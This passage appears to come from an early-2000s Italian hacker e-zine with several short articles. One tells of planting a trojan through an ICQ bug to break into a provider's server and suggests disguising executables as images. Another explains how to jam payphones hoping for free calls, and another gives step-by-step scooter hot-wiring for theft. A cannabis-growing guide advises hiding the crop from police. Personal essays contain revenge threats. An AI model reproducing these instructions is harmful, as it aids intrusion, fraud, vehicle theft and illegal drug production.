quel file TUTTE le password di accesso al provider, infatti ci e` stato 
possibile anche accedere alla 
directory che conteneva tutti i siti presenti sul server; 
sfortunatamente il provider aveva avuto 
l'accortezza di proteggere la sua root directory quindi non abbiamo 
avuto accesso ai file log ed a quelli 
delle passwords. Ma poco male eravamo anonimi a sufficienza.

 Ce ne siamo quindi andati salutando e ringraziando. Da tutto questo io 
credo sia facile capire come viurs 
quali melissa o tutti quelli distribuiti via E-mail abbiano una cosi` 
larga diffusione, e come spesso i 
sistemi di sicurezza che le aziende installano o lo zelo dei provider 
che si dotano di software sicuro ed 
aggiornato risultino spesso sforzi vani di fronte all'ingenuita` ed 
alla faciloneria che gli utenti da poco 
sbarcati sulla rete spesso mettono nel compiere le loro azioni.

 E' incredibile, e nessuno di noi che ha partecipato a questo avrebbe 
mai creduto quando siamo pariti, 
che sia possibile entrare su un server dalla porta principale, con le 
chiavi; fare cio` che si vuole, 
ed uscire senza che nessuno sappia chi e` entrato. E` improponibile che 
si pensi di poter utilizzare la 
rete come mezzo di comunicazione omnicomprensivo quando l'utente che 
ormai sta per diventare standard non
 e` in grado di garantire NON solo la propria personale sicurezza e la 
sicurezza dei suoi dati, ma pure sia
 in grado di mettere in serio pericolo la sicurezza di un intero 
server. La parte piu` delicata sta nel 
fatto che il problema NON e` assolutamente risolvibile aumentando la 
sicurezza del software; certo se ICQ non 
avesse avuto quel baco avremmo dovuto trovare un altro modo per fare 
eseguire il troiano, ma considerate 
anche il fatto che si poteva attaccare un troiano ad uno .zip ed 
eseguirlo all'apertura oppure visto che 
ormai moltissime persone NON visualizzano l'estensione del file, 
inviare un .exe con l'icona giusta dicendo 
che era un .jpg. Secondo noi sarebbe assolutamente necessario 
sensibilizzare gli utenti verso cio` che 
realmente e` la rete, invece che rimbecillirli con portali e siti 
commerciali.


Mr. A


---------------------------------------=Phreaking=---------------------------------------------


              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
              	      INFORMAZIONI GENERALI SUL PROTOCOLLO WAP              
              				    		                A[v]a[t]A[r]  
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Da un po di tempo sono comaprasi sul mercato telefoni cellulari di nuova 
generazione che permettono di collegarsi ad internet.Come tutti sapete invece 
la connesione attraverso un computer avviene attraverso un browsers che ci 
permette di visalizzare le pagine web fatte con speciali linguaggi molto conosciuti 
tipo il flash, Java,dhtml e molti altri che non sto qui ad elencare.Logicamente 
tutte queste pagine non sono visulaizzabili su un minuscolo schermo di un telefonino 
e quindi per farlo c' bisogno di un nuovo protocollo,quello WAP (Wireless 
Application Protocol).C' da dire che questo protocollo non doveva neanche essere 
utilizzato ma in seguito alle decisoni delle maggiori case produttrici di telefonini 
eccoci a spiegarlo.
Il WAP  un protocollo totalmente diverso dall'HTTP ma cio non vuol dire che 
sia inferiore.
Per farvi fare un'idea vi indichero alcune differenze.Una  sicuramente quella 
che tramite questo protocollo non vengono inviate pagine HTML, ma pagine WML (Wireless 
Markup Language). Il WML deriva direttamente dall'XML (come del resto l'HTML) 
ed  ottimizzato per la trasmissione a 9600 baud, velocit massima raggiungibile 
dai telefoni cellulari attuali.
Per questo quindi possiami capire che non sono presenti tutti i tags basti notare 
che non  possibile eseguire suoni,filmati e video anche se questi sono di 
dimensioni ridotte.
Questo pero non  proprio tutto vero infatti  stato creato un nuovo formato di 
immagini ottimizzato proprio per i cellulari. Si tratta di piccole immagini 
bitmap in bianco e nero che occupano pochissimo, salvate nel formato .wbmp che non 
 altro che la copia del formato .bmp dei computer.Diamo ora uno sguardo alla 
piattaforma WAP. Come avviene lo scambio di informazioni tra telefonini e server? In 
maniera molto simile a quella del protocollo http. La piattaforma WAP  
formata da un gateway che si occupa di connettere la rete di telefonia cellulare (GSM 
in Europa e CDPD per gli Stati Uniti) e la rete di Internet. Questi 
gateway hanno il compito di tradurre i segnali delle apparecchiature WAP (per 
ora telefonini e palmari) in http e di inviarli in seguito ad un server web. Il 
server invia i dati di risposta al gateway che li riconverte in segnali fruibili 
alle apparecchiature WAP.
Se volete iniziare a smanettare con il WML  necessario che vi procuriate 
alcuni tools.Vi consiglio l'sdk della nokia che potete trovare gratuitamente 
su http://www.forum.nokia.com su cui potete trovare anche un'ottimo emulatore 
per cellulari (poi non dite che sono cattivo).
Infatti per vedere correttamente le pagine WML avrete bisogno di un software 
specifico che sia in grado di leggerle. Questo emulatore riproduce (in tutto, 
compresa la forma e il colore) un cellulare Nokia 6110 o, a scelta, il modello 
6150 (anche se, a dire il vero, questi due modelli non sono abilitati alla 
navigazione in rete). Un'altra caratteristica interessante di questo emulatore  
la possibilit di navigare nei veri siti sviluppati in WML. E' presente inoltre 
un editor, col quale potrete creare delle immagini e salvarle nel formato .WBMP. 
L'SDK  stato sviluppato in Java per essere facilmente portabile su altre piattaforme, 
quindi per farlo funzionare dovete aver preventivamente installato un 
compilatore java oppure il JRE (Java Runtime Environment). Io ho usato il JDK 
della Sun nella versione 1.2.2 e devo dire che funziona a meraviglia. Un piccolo 
inciso: l'ambiente di sviluppo parte lanciando dalla directory:

..\Programmi\Nokia\Nokia WAP Toolkit

il comando:

java -jre wapsdk.jar


Ovviamente nel vostro autoexec.bat dovr essere specificato il path del 
file java.exe, altrimenti non funzioner J.Vi consiglio di creare un file 
batch con la riga qui sopra, per automatizzare la procedura di avvio (che 
altrimenti diventa un po' noiosa). In realt l'sdk dovrebbe partire con il 
file toolkit.exe, ma io non sono riuscito a farlo funzionare.
Spero la mia spiegazione vi abbia soddisfatto se no mailatemi e fatemi capire il perch.




              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
              	            COME T'INFLIPPO LA NUOVA CABINA                 
              				    		                    mR_bIsOn  
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






Titolo: Come t'inflippo la nuova cabina
Autore: mR_bIs0n
Musica ascoltata: MP3 a palla... punk in partikolare
Consumo: ho appena finito di mangi
Stato di Salute: Mah kos e kos... ahhh kome era bello kuando avevo la
                 varicella...
Abbigliamento: casual... tanto ke ve ne frega...
Saluti: A tutti i miei amici sia di IRC ke della skuola, un partikolare saluto
        a Davide, Biby e Carmine (degli WinME dipendenti... ah povere menti...
        lo zio Bill si  mangiato anke le loro...), tutta la nostra nuova
        crew e a tutte le ragazze bellissime ke konosko ma non sto qui a
        dirvele!
Fanculo: Bah... diciamo in partenza a Fabio Fanizza, Giuseppe Pasanisi e 
         Alessandro Ceino, gli immankabili... poi anke a tutte le prof.esse,
         anzi megli a tutte le proFESSE! Porka eva, krepate!

Urka iniziamo!!!

Bene, bene... hanno montato le nuove cabine telekozz... uhmmm... ma ke son
belle... ma ke son karine... insomma, leggetevi l'art di RadioZer[0] per 
saperne di pi! Comunque c' qualkosa ke ankora nessuno pu dirvi... ihihihih... 
e cio ke kodeste kabine sono nuove e quindi sono piene di bugs!
E proprio kos! Infatti vi rikordate delle cabine della telekozz ke avevano 
montato nel 1990 per i mondiali e ke erano buggate e bastava premere in 
kontinuazione il tasto del kambia lingua per kiamare gratis???
Bene anke a kueste nuove ci sono degli errori ke la zia Telesuck non
ha ankora korretto... ci potrebber essere molti bugs, ma io vi parler uno in
partikolare ke sono riuscito a skoprire! Oki!
Stavo nella mia kara villa (giardini pubblici) dove avevano montato delle
nuove kabine... uhmm... vediamo un po'ke se po'fare! Allora mi prokuro un po'
di skede skarike... provo ad inserirne una... me la risputa! Ma porka puttana 
ti faccio vedere io! La ficco con forza la kabina fa forza a risputarla, ma
non riesce... mentre si dimena alzo e abbasso la cornetta... ihihihih... la
cabina inizia a suonare kome una matta! Eheheh bene, bene!
Ma kosa succede? Iniziano ad uscire strane skritte! La mia skeda se la prende
dentro e non me la da'pi! Ah porka! Ad un certo punto lo skermetto si fa nero
ed eskono altre skritte... uhmmmm! Ad un certo punto esce anke uno strano 
men!!! UAU!!! Non ho kapito un kazzo di kosa sia successo n mi rikordo kome
ho fatto! Porka eva!
Oki ci provo altre volte... la kabina in questione si pappa 4 mie skede 
vuote... tutt'ora la kabina non n accetta di altre! Ihhiihihhihi!
Ma niente paura! Vi spiego io kome fare ad inflipparla!
Prokuratevi una skeda Ricaricard della Tim! Usatene una usata, mi rakkomando!
Vanno bene anke di altre societ telefoniche! L'importante  ke siano della
stessa grandezza! Poi prendete la skeda, e togliete (se c'!), akkuratamente 
l'adesivo dove c' skritto il kodice usato! Pulite kon un panno o della karta
igenica imbevuta di alkool etiliko la superfice dove c'era prima l'adesivo.
In questo modo la vostra skeda non si incepper facilmente nella kabina!
Oki ora fatto ci infilate la skeda nella kabina... hiihi la prima skritta ke
vi uscir  kuesta:
			'frode'
EHEHEHEH da scirokkati!!! Bene ora infilate la skeda... non entrer tutta! Poi
ve la vorr sputare, e voi nel mentre ke ve la sputa la spingete sempre pi
dentro! Mentre fate kuesto alzate e abbassate la kornetta in kontinuazione!
Vi sembrer tutto + facile kuando lo farete! Attenzione a non farvi prendere
per un pazzo!!!
Bene se dopo un certo punto uscir skritto 'Chiamata E&M attiva'... oppure
uscir skritto ke il telefono  fuori servizio siete vicini ad impallarla!
Fate tutto kuesto per 5 minuti buoni... vi assikuro ke funziona! Appena
s'inflippa lo skermo si riempe di cursori neri... lampeggianti... dopo un po'
un sakko di strane skritte ke sto ankora annotando... mooolto presto ci sar
un altro art kon annotate tutte le skritte ke la kabina ci d!
Bene quindi aspettate e pregate ke ci sia un metodo per kiamare aggratiz...
mi fate un piacere se pregate anke per i miei semini di marja e ke kreskano
presto!!!
Salutoni!!!!
mR_bIs0n
   
--------------------------------------=Riflessione=--------------------------------------------


              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
              	                     RIFLESSIONE                            
              				    		                Jrash         
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


_-_-L amore, l amore_-_- 
Crew  : H@team       E-mail: jrash@hackersat.com   URL   : www.hackersat.com    

Ciao ragazzi sono Jrash, il vostro fedele amico, per alcuni invece sono il nemico 
numero1; vabbe ora non ci importa non so proprio cosa dirvi, non so neanche perche 
scrivo quest articolo, neanche perche sono nato, non so perche esiste la scuola , 
perche esistono le cose brutte e quelle belle!! 
Ora leggerete un articolo che un amico ha scritto su di me prendendomi come esempio 
ed appunto si rivolge a tutti voi lettori, buona lettura....
Una delle cose che mi fa riflettere e riguarda  noi ragazzi  l amore! Ma non  
riguarda solo noi ragazzi anche le ragazze, pero in quest articolo mi riferisco ai ragazzi.. 
Ci sono ragazze che ci piacciono e per questo che ci vengono i cosidetti "ingrippi". 
L amore  una cosa bellissima ma puo trasformarsi anche in cosa orribbile, soprattutto 
quando noi amiamo, ma questo sentimento non ci viene ricambiato...non sara cosi per tutti 
ma alla maggior parte di noi capita proprio questo.     
Cosi ci chiudiamo in noi stessi ed allora si fanno cose indegne tanto piu indegne 
quanto piu  grave la situazione; a questo punto si impazzisce si fa di tutto: c  
chi porta la foto dell amata con se e quindi per lui  come se al mondo esistesse solo 
lei ; chi cade nell alcool e tantopeggio chi cade nell tunnell maledetto della droga, 
solo per una stronza, e...stronza o meno ti puo rovinare la vita.    
Ci sono pure altre cose che si fanno per una stronza cose da un certo lato piacevoli , 
ma da un altro lato possono peggiorare la situazione: per esempio chi  come Jrash, 
quando riceve un "palo" o peggio ancora, decide di vendicarsi contro la stronza( cosi 
merita di essere chiamata) ed allora Jrash e quelli come lui ne combinano di tutti i 
colori e ripagano l offesa con la stessa moneta anzi con gli interessi, perche ricordate 
che a Jrash mai nessuno gli ha messo i piedi in testa e chi ci prova soltanto la paga 
amaramente. Prendetela come una minaccia. 
Jrash  uno di quelli a cui non gliene fotte niente , lui non ha paura di nessuno 
e a chi osa contrastarlo gli dice: " meta fa nu buc*****" . Cmq ora basta riprendiamo 
all argomento di prima e cioe l amore come metafora spaziale( s fa p dic, capisc a me); 
in amore ci sono due modi per prevalere nel rapporto: o devi essere dolce e romantico, 
oppure come direbbe il mio amico Christopher: ia cummanna (devi dominare con forza) 
soprattuto se la tua ragazza  un po "zucculell" e questo si verifica nel 70% dei casi.
Ma a  volte anche noi siamo cattivi perche guardiamo solo l aspetto esteriore delle ragazze, 
ma la prima cosa che noi dobbiamo guardare  l aspetto interiore, come sono fatte dentro, 
cosa provano, ecc... perche a me quelle "solo curve" e senza cervello, ne cuore non 
mi piacciono affatto.                                      
Riguardo alle ragazze di bassa bellezza noi ragazzi le trattiamo male, con 
disprezzo ma Jrash si limita a fare questo, se una ragazza non  una miss mica 
gielo va a dire, ma cerca in tutti i modi di non offenderla; anche se a molti 
sembra un personaggio oscuro non lo  ve lo assicuro, vi dico solo che anche lui 
ha un cuore , anche lui  capace di amare e di provare altri sentimenti. Con 
questa descrizione non mi riferisco solo a lui ma anche a molti altri che hanno il  
suo stesso atteggiamento, io per questo li stimo tutti perche so quello che provano 
e  come si sentono , perche anche Jrash  passato per questa esperienza e la sta 
ancora  vivendo. Lui sta male, per lui la vita non ha piu senso, a volte pensa di 
voler morire, se non era per me l avrebbe gia fatto, percio si comporta in questo 
modo, cercate di capirlo.
Ragazzi ora non voglio andare per le lunghe voglio solo augurarvi tutta la felicita 
che esiste al mondo in tutta la vostra vita , che dobbiate avere fortuna soprattutto 
in amore, che la ragazza che vi piace non sia come quella che piace a Jrash altrimenti 
passerete le pene dell inferno e ... basta non ho nient altro da dire. Solo 
un ultima cosa riferita al mio amico Jrash : non mollare, fagliela pagare 
pensa a maryee che  migliore di quella stronza.. ciao a tutti!!!  
                                            ANONIMO.	  		
Ragazzi questo mio amico di cui mi ha pregato di non farne il nome  un grande e 
credo che abbiate capito il senso dell articolo... certo l ho modificato perche la 
versione originale era abbastanza lunga e poi si riferiva solo alla mia persona ed 
appunto per premiare la sua bonta ho deciso di farlo pubblicare. Ringrazio tutti coloro 
che mi sostengono e saluto tutti i lettori... alla prossima!!!        	
Ringraziamenti: Maryee perche  troppo bella; ed A[v]a[t]A[r] perche mi  stato sempre 
vicino!!  Un FUCK OFF a quella stronza di Giada; a Dolcissimo e Popo, due bravi 
lamerucci....
Inoltre potete scrivermi se ne volete discutere al seguente indirizzo:  jrash@hackersat.com   

JRASH^^    20/01/2001	

===================H@team=====================================================[ThE_rEaL_JrAsH^^] 						




              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
              	                  INTERNET E REALTA'                        
              				    		                Jrash         
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




      Internet e Realta!!
Ciao ragazzi sono sempre io Jrash^^ . Come sapete sono nel mondo dell hip hop e proprio 
per questo scrivo questo articolo.. Leggetelo tutto mi raccomando!!	
Non sono un mc non ho mai scratchato n usato i piatti , non sono un writer e non ballo . 
Faccio parte della schiera che vuole amare , capire, studiare interpretare e vivere 
l hip hop alla sua maniera....ed anche diffondere , perche no?? Basta che questo si tramuti 
in una diffusione positiva . Ossia non imposta del tipo: io ascolto l hip hop e tu la truzzo 
music. Cambia testa di cazzo!         
Ma spiegata, perche alla fine i gusti sono gusti , non saro certo io a convincerli che 
sono deficienti. Credo che alla fine bisogna avere almeno una fiammella dentro 
che bruci per l hip hop, magari inconsapevolmente, ma che poi, al momento buono 
esploda e si incendi dentro il corpo, lo spirito, il cuore.Diffusione positiva allora.
E qui arrivo al cuore del discorso: internet ed aggiungiamoci la parola MP3 che 
ultimamente fa tanto fico.                               
Purtroppo attualmente tranne poche sortile a casa , mi sono dovuto allontanare un po 
da quello che per due anni  stato il mio mondo . Navigo moltissimo e dedico tutto il mio 
tempo online  ai misconosciuti gruppi di discussione , uno dei mezzi piu interessanti 
per dire la propria opinione , ed alle famigerate chat, tramite MIRC , troppo spesso 
invase dai cosidetti "lamer" , ossia gente che fa casino apposta  .
E naturalmente scaricavo MP3.   
Internet mi ha permesso di conoscere amici eccezionali , di poter girare l italia sicuro 
di poter trovare comunque un posto dove passare la notte ed altro.   
Certo oltre alla cosidetta "virtual life" , porto avanti parallelamente la stessa vita 
senza essere schiavizzato , come purtroppo tanti, troppi finiscono , dal mostro Internet.
Non ha senso chiudersi in stanza e vivere solo online , magari perche si  piu sfigati fuori. 
Tramite Internet si mantengono contatti con persone che hanno i tuoi stessi gusti  o con cui 
ti senti in sintonia. il punto su cui mi preme soffermare l attenzione sono gli MP3 .
Tramite appositi programmi scambio MP3 di rapper italiani sempre e solo allo 
scopo di diffondere e scegliere meglio i miei acquisti in CD.   
Credo che l utilizzo migliore alla fine sia questo, diffondere via internet 
alcune canzoni di un album a mo di assagio per orientare l acquisto di utilizzare 
gli MP3 per diffondere i pezzi di quei gruppi o rapper sconosciuti che cosi 
possono iniziare a farsi sentire.				              
PS: chi vuole capire, capisca!!
Ho scritto questo articolo per fornirvi maggiore conoscenza in campo, non per fare 
pubblicita occulta. Ringrazio tutti i lettori dei miei articoli!! GRAZIE!!	
Ringraziamenti: un saluto agli amici dell H@team!!		
Un FUCK OFF a Dolcissimo e Popo!! 				


JRASH^^  22/01/2001

===========HACKERS@team=====================================================[ThE_rEaL_JrAsH^^]





-----------------------------------------=Mezzing=---------------------------------------------


              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
              	                COME RUBARE UN MOTORINO                     
              				    		                Jrash         
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






Salve ragazzi sono Jrash l esperto in scooter; in questo articolo vorrei parlarvi di un 
argomento abbastanza interessante: come rubare un motorino! 
La cosa  semplicissima, ma tutto il contenuto di questo testo  da ritenersi dannoso, 
quindi non applicabile. L utente  pregato di non mettere in atto quanto 
scritto. Esso  solo stato pubblicato per offrire una maggiore conoscenza in 
campo, NON per altri scopi. Il testo non si puo modificare tantomeno vendere 
senza il consenso dell autore. 		

La prima cosa da fare  cercare un posto isolato dove non ci sia nessuno 
eccetto lo scooter, altrimenti che diamine! cosa rubiamo!  
Assicurarsi che non ci siamo catene, bloccadischi e altre cose perche 
renderebbero l operazione molto piu complicata, e per fare questo dobbiamo 
impiegare massimo 5 minuti, e non di piu!!Una volta fatto questo passiamo alla 
parte piu interessante, sempre avendo gli occhi ben aperti e sempre pronti a fuggire 
nel caso che venisse qualcuno.   
Allora riprendiamo da quello che stavo dicendo prima :
1)La prima operazione da effettuare per accedere al vano retroscudo e al blocchetto 
commutatore, dove si trovano i cavi per l accensione,  la rimozione dello scudo anteriore.

2)Smontare la plastica posizionata dietro allo scudo ; se quest operazione vi rende la 
cosa difficile vi consiglio di distruggere lo scudo anteriore, nella maggior parte dei 
casi  la cosa migliore da fare, senza pero intaccare le parti vitali dello scooter, come 
il blocchetto commutatore eccetera perche seno altrimenti sarebbe la fine.  

3)Dopo aver smontato o distrutto la parte anteriore , individuare il cablaggio principale 
del blocchetto di accensione.   

4)Sfilare i due connettori del cablaggio principale dello scooter unire i fili 
facendo attenzione, perche i fili sono tre e solo due devono unirsi.    

5)A questo punto bisogna solo rompere il bloccasterzo se c . Per farlo bisogna dare un 
netto colpo forte e preciso, accendere lo scooter tramite start del carter oil e fuggire 
alla massima velocita... lol                    

Ringraziamenti: Meryee di #secolo per la sua bellezza;  
A[v]a[t]A[r] dell H@team per la sua potenza e inoltre vorrei fare un saluto a tutta 
la 3c del severi di salerno!                    Un FUCK OFF a popo e Dolcissimo!! 


JRASH^^                                 13/1/2001	
=============jrash@hackersat.com====H@team===========================================[Jrash^^]



              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
              	      COME SCEGLIERE E MONTARE UN VALIDO ANTIFURTO          
              	                   SUL VOSTRO SCOOTER                Jrash  
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





(*)*(*)*(*)*(*)*(*)*(*)*(*)*(*)*(*)
Autore: Jrash^^ 
Crew  : H@team 
E-mail: jrash@hackersat.com    
URL   : www.hackersat.com
(*)*(*)*(*)*(*)*(*)*(*)*(*)*(*)*(*) 
Salve ragazzi sono JRASH l esperto in scooter, in questo articolo vorrei parlarvi di un 
grosso problema: nel nostro paese i furti di scooter sono all ordine del giorno e , 
proprio per questo ho deciso di darvi dei consigli sulla scelta e il montaggio 
di un antifurto elettronico.
 Prendiamo subito in considerazione tutti i requisiti essenziali di un 
antifurto elettronico affinch possa essere definito tale .
In primo luogo vi consiglio di diffidare di prodotti di non chiara provenienza: fidatevi 
esclusivamente di antifurto di produzione nazionale o importati da aziende di 
una certa seriet, per poter usufruire di un assistenza valida.
L evoluzione di questi sistemi  veramente frenetica ed ora  possibile trovare 
in commercio antifurto sempre piu piccoli , efficienti, impermeabili e facili da 
montare, grazie a dei cablaggi specifici dedicati alla maggioranza degli scooter 
presenti in commercio .
E cosi possibile effettuare il montaggio semplicemente sfilando le connessioni 
elettroniche originali e inserendo "a ponte" quelle dell antifurto .
 estremamente importante che questo sia autoalimentato , in modo che possa continuare 
a funzionare anche in caso del taglio dei cavi della batteria , che sia provvisto di 
codice variabile e bloccomotore , che magari sia dotato del sistema antiaggressione , per 
prevenire i tentativi di rapina quando si  gia in sella alloscooter.
Ora vi spiego il procedimento di montaggio, su uno scooter qualsiasi, di un antifurto 
patron line, uno dei piu evoluti sul mercato, gia dotato di un cablaggio specifico.								
1)La prima operazione da effettuare per accedere al vano retroscudo  ed al blocchetto 
commutatore  la rimozione dello scudo anteriore.    
2)Smontare la plastica posizionata dietro allo scudo. 
3)Rimuovere la parte bassa del cruscotto.
4)Dopo aver smontato la parte anteriore della carena dello scooter, individuare il 
cablaggio principale del blocchetto di accensione.
5)Sfilare i due connettori del cablaggio principale dello scooter e montare "a ponte" il 
cablaggio dell antifurto: i connettori sono del tipo a innesto obbligato, quindi l operazione 
 estremamente semplice.
6)Cablaggio principale assemblato al cablaggio dell antifurto.
7)Individuare i cablaggi degli indicatori di direzione.
8)"Ponticellare " i fili del positivo delle frecce con i fili provenienti dall allarme 
utilizzando gli specifici connettori a pressione.
9)Connessione con i fili degli indicatori di direzione ultimata.
10)Fissare l antifurto , con il nastro biadesivo fornito nel kit; in una parte 
sufficientemente riparata del vano retroscudo.    
11)Ora non ci resta che istallare la spia luminosa su una parte del cruscotto..

Ringraziamenti: Maryee(#secolo) perche senza di lei non potrei vivere  ;A[v]a[t]A[r] ,
dell H@team, perche senza di lui ora non sarei qui!!		
Se volete potete scrivermi per ulteriori informazioni a :  jrash@hackersat.com 

JRASH^^                                                    31/12/2000
###########################_jrash@hackersat.com_################################[Jrash^^] 




-----------------------------------------=Narcoting=-------------------------------------------

              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
              	                   MARIA COLTIVATION                        
              				    		                       phaet  
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





INTRODUZIONE 

Ci sono poche cose nella vita buone quanto la propria erba, coltivata proprio da te, fuori 
nel giardino e dentro nei vasi... 
L'origano, l'aneto, il basilico, la salvia ed altre piante aromatiche sono tutte facili da 
coltivare. La menta si espande in tutto il giardino, se la lasci fare. La menta piperita e il 
celantro sono fantastici in insalate e piatti orientali. Ma tutto ci porta ad una pianta 
veramente significativa che, per chi la conosce bene,  la migliore amica, un ottimo rimedio 
naturale e una filosofia di vita.  
La maggior parte della gente pensa ai giardini come un progetto stagionale anzich annuale, 
ma  davvero meno dispendioso e pi rimunerativo mantenere il giardino efficiente a rotazione 
annuale. Se sei tentato a coltivare a rotazione annuale, avrai bisogno di tecniche di 
giardinaggio al coperto almeno per il periodo invernale per mantenere il giardino 
produttivo. Avrai erba fresca tutto l'anno, non dovrai preoccuparti di immagazzinare il 
raccolto tra l'inverno e la primavera, richiede meno spazio, ed una volta sistemato, 
richiede solo una minima attenzione ogni settimana per mantenerlo produttivo a livelli 
ottimali. 
Il lato migliore dell'essere un giardiniere  il rapporto con la terra. Ti congiunge con la 
natura e ti arricchisce spiritualmente. Prova a dare energia alle tue piante trasmettendo 
loro pensieri positivi ed energia ogni volta che vai a curarle. Trovo che questo aiuta molto 
me come aiuta molto loro. Le mie piante sembrano rispondere favorevolmente. [N.d.T.: Le 
affermazioni di quest'ultimo periodo sono alquanto discutibili!]


LA GENETICA E LA PIANTA

E' molto importante cominciare con buone nozioni di genetica. 
Dovresti cercare di trovare da giardinieri del posto semi che siano acclimatati e 
riprodotti per il clima locale con le migliori caratteristiche floreali. Potenza, aroma, 
crescita rapida, maturazione precoce, resistenza ai funghi e ai parassiti. Tutti questi 
fattori sono presi in considerazione dal giardiniere esperto e tu non potrai che trarre 
innumerevoli benefici dall'avere un'amica che ti faccia partire in un viaggio senza fine. 
Cerca di procurarti un ibrido Indica-Sativa se possibile, in modo da ottenere le dimensioni 
pi indicate ed anche ottime caratteristiche per la coltivazione al coperto. Le piante Indica 
sono povere di principio attivo, adatte a terreni sassosi, cosa assai fastidiosa, mentre le 
Sativa crescono con difficolt nei luoghi chiusi per effetto delle elevate richieste di luce 
e germogliano pi tardi. Un ibrido pu essere cos un compromesso che avr l'elevato effetto 
psicotropo della Sativa e la tendenza alla maturazione precoce dell'Indica.  
L'Indica  facilmente riconoscibile dalle sue foglie estremamente larghe che sono molto 
arrotondate ai lati. La Sativa ha foglie molto strette, simili alle dita. Un ibrido avr 
le caratteristiche di entrambe con foglie che sono un incrocio di questi due tipi: pi 
sottili di un'Indica, ma molto pi larghe di una Sativa. E' possibile riconoscere un buon 
ibrido dalle foglie, una volta che hai capito cosa osservare. 
Assicurati che i semi siano marrone scuro o grigio chiaro. Alcuni possono avere delle linee 
scure in aggiunta a questi colori, come le striature di una tigre. I semi bianchi e piccoli 
non sono maturi e non dovrebbero essere piantati.


DENTRO E FUORI: STRATEGIA DEL RACCOLTO COSTANTE

Una delle migliori soluzioni per fornire energia secondo la maggior parte dei giardinieri 
domestici  quella di servirsi della luce solare all'esterno per la fioritura e della luce 
continua all'interno per germogliamento e la crescita vegetativa. Ci garantisce il vantaggio 
di un naturale ciclo di luce/buio e riduce della met il tuo consumo di energia in rapporto 
alla stessa operazione all'interno. Una piccola serra pu essere costruita in fibre di vetro 
Filon o in pannelli di PVC che sono innocui e sembrano molto ad un capannone di deposito o ad 
un capannone degli attrezzi, in pi  poco probabile che desti sospetti. 
Di fatto un grande capannone di metallo o di legno compensato pu essere modificato con un 
tetto luminoso di PVC, vetro, fibre di vetro o pannelli di plastica, ed alcune specie che non 
richiedono una grande quantit di luce, cresceranno bene. Un capannone siffatto impedir 
avvistamenti dal cielo e ti permetter di proteggere la tua attivit! Ti consente anche di 
tenere lontani ratti e tartarughe gopher, mantiene a distanza i mocciosi del vicinato e pu 
essere facilmente chiuso a chiave. Ti dar anche l'opportunit di piantare effettivamente 
nel terreno, se lo vorrai, e questa  la migliore soluzione per evitare piante ancorate a 
terra da radici (se non stai usando colture idroponiche), ed ottenere raccolti pi abbondanti.
In inverno lo spazio al coperto viene di norma usato per iniziare con le nuove pianticelle o 
i tagli, per essere portati fuori in primavera, utilizzando la luce naturale del sole per 
maturare le piante. Questa routine garantir almeno tre raccolti aperto/serra per anno. Se 
 disponibile pi spazio per cominciare continuamente all'interno e per fiorire le piante 
del secondo raccolto all'aperto, sono possibili raccolti ogni 60 giorni nella maggior parte 
delle localit, con un piccolo raccolto al coperto durante la stagione invernale come 
ulteriore possibilit. 
La strategia di base per una produzione nel corso di tutto l'anno  capire se la pianta ha 
due cicli di crescita. Durante la germinazione la pianta entra in uno stato vegetativo in 
cui potr usare tutta la luce continua che riuscirai a garantirle. Questo significa che 
nessun ciclo di buio  richiesto. La pianta sar costantemente in fotosintesi e crescer 
pi velocemente di quanto accadrebbe all'aperto con lunghi intervalli di notte. La 
fotosintesi si arresta durante la fase di buio e la pianta usa gli zuccheri che ha 
prodotto per crescere durante la notte. Questa non  una necessit ma la pianta crescer 
pi velocemente in questa fase con una continua fotosintesi (luce costante). 
Una volta che la pianta  alta 30-50 centimetri, tempo permettendo, pu essere forzata a 
cominciare la fioritura portandola fuori nel periodo primaverile o autunnale.  (Per la 
fioritura estiva all'aperto, la notte deve essere artificialmente allungata nella serra 
per "forzare" le piante a fiorire. Vedi il capitolo 'Fioritura'.)  
Portando le piante a periodi di 10-13 ore di luce (spostandole all'aperto) con oscurit 
ininterrotta (nessuna sorgente di luce intensa nelle vicinanze) le si forzer a fiorire. 
Matureranno e saranno alte 50-100 cm quando saranno pronte per il raccolto. Quando una 
pianta viene spostata da una sorgente di luce continua al coperto ad un periodo di 10-13 
ore al giorno fuori, comincer a fiorire prevedendo un'incombente inverno. I processi 
vegetativi spostati all'aperto il 1 marzo, saranno giunti a maturazione il 1 maggio. I 
processi vegetativi spostati all'aperto il 1 maggio, saranno giunti a maturazione 
il 1 luglio. I processi vegetativi spostati all'aperto il 1 settembre, saranno belli 
pronti per il 1 novembre. In Inverno queste operazioni vengono compiute all'interno e una 
pianta viene piantata per semenza in previsione di piantare all'aperto l'estate successiva, 
o soltanto per avere un po' di roba extra da parte per l'inverno.  
Tieni presente che lo sbirro va in cerca delle piante nel periodo tra settembre e novembre, 
e non pu in alcun modo notare in aprile piante sistemate all'aperto che fioriscono. Sii 
furbo, fatti il tuo gran raccolto in maggio, non in ottobre!


COLTIVARE DENTRO

Si dovrebbe trovare un piccolo spazio al coperto in modo da servirsene per germinare i semi. 
Questi processi vegetativi iniziali vengono poi portati all'aperto per maturare in primavera, 
dopo la fine delle ultime gelate. 
Lo spazio pu essere uno sgabuzzino, una zona della camera da letto, un'area della cantina, 
una soffitta o un bagno non usato. Alcune persone dedicano l'intera camere da letto alla 
coltivazione. 
Lo spazio non dovrebbe avere fessure che lasciano filtrare la luce, in modo tale che nessuna 
luce sospetta possa essere vista dall'esterno. Ci potrebbe attirare pulotti o ladruncoli. 
Lo spazio dovrebbe essere ventilato. Lasciando aperta la porta di uno sgabuzzino potrebbe 
esserci ventilazione a sufficienza se lo spazio non  illuminato da forti luci che generano 
molto calore. 
Separare l'aria viziata in uscita e quella buona in entrata  la cosa migliore. Una presa 
